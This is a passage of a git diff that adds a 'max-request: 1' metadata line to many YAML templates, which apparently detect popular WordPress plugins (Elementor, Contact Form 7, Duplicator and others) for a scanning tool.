a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ 